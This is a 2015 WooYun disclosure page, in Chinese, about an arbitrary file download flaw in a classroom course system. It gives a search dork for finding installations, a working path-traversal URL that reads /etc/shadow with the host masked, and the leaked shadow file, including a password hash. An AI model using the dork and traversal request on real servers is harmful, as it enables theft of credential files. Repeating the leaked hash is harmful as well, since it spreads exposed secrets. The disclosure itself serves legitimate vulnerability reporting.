当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126332

漏洞标题:某教室精品系统任意文件下载#1

相关厂商:天空教室精品软件

漏洞作者: jianFen

提交时间:2015-07-15 14:05

修复时间:2015-10-15 16:04

公开时间:2015-10-15 16:04

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-20: 细节向第三方安全合作伙伴开放
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

../../../../../../etc/shadow/
不类型漏洞 分开交咯

详细说明:

intext:天空教室技术支持
2.任意文件读取(shadow)
-------------------------------------------------------------------------------
**.**.**.**/sc8/coursefiledownload?courseId=272&filepath=../../../../../../../../../../etc/shadow&filetype=2
http:/**.**.**.**/sc8/coursefiledownload?courseId=272&filepath=../../../../../../../../../../etc/shadow&filetype=2
http://**.**.**.**/sc8/coursefiledownload?courseId=272&filepath=../../../../../../../../../../etc/shadow&filetype=2
**.**.**.**/sc8/coursefiledownload?courseId=272&filepath=../../../../../../../../../../etc/shadow&filetype=2

漏洞证明:

http://**.**.**.**/sc8/coursefiledownload?courseId=272&filepath=../../../../../../../../../../etc/shadow&filetype=2
root:$1$Vs.PT/SM$CkschLT358----打码Ba.:15726:0:99999:7:::
bin:*:14699:0:99999:7:::
daemon:*:14699:0:99999:7:::
adm:*:14699:0:99999:7:::
lp:*:14699:0:99999:7:::
sync:*:14699:0:99999:7:::
shutdown:*:14699:0:99999:7:::
halt:*:14699:0:99999:7:::
mail:*:14699:0:99999:7:::
news:*:14699:0:99999:7:::
uucp:*:14699:0:99999:7:::
operator:*:14699:0:99999:7:::
games:*:14699:0:99999:7:::
gopher:*:14699:0:99999:7:::
ftp:*:14699:0:99999:7:::
nobody:*:14699:0:99999:7:::
rpc:!!:14699:0:99999:7:::
mailnull:!!:14699:0:99999:7:::
smmsp:!!:14699:0:99999:7:::
nscd:!!:14699:0:99999:7:::
vcsa:!!:14699:0:99999:7:::
rpcuser:!!:14699:0:99999:7:::
nfsnobody:!!:14699:0:99999:7:::
sshd:!!:14699:0:99999:7:::
pcap:!!:14699:0:99999:7:::
ntp:!!:14699:0:99999:7:::
dbus:!!:14699:0:99999:7:::
haldaemon:!!:14699:0:99999:7:::
avahi:!!:14699:0:99999:7:::
avahi-autoipd:!!:14699:0:99999:7:::
postgres:!!:14699:0:99999:7:::
named:!!:14699:0:99999:7:::
xfs:!!:14699:0:99999:7:::
gdm:!!:14699:0:99999:7:::
sabayon:!!:14699:0:99999:7:::
mysql:!!:14819::::::
nologin:$1$8O6ApHzG$s8lFaCa.G.MP4ogeqSgXw0:15281:0:99999:7:::

修复方案:

过滤filename

版权声明:转载请注明来源 jianFen@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-17 16:02

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件或电话通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无


漏洞评价:

评论